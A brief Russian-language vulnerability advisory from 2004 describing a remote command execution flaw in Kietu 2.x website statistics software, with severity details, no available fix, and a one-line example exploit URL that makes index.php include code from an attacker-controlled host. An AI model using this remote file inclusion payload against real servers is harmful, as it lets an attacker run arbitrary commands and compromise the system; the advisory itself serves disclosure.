Security Lab

Удаленное выполнение произвольных команд в 'Kietu?'

Дата публикации:01.02.2004
Всего просмотров:1268
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Kietu 2.x
Уязвимые версии: Kietu?

Описание: Уязвимость обнаружена в 'Kietu?' web site statistics software в 'index.php'. Удаленный пользователь может выполнить произвольные команды операционной системы на целевой системе.

Пример/Эксплоит:

http://[target]/index.php?kietu[ur l_hit]=http://[attacker]/,
где 'http://[attacker]/config.php'

URL производителя:http://www.kietu.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Kietu 'index.php' flaw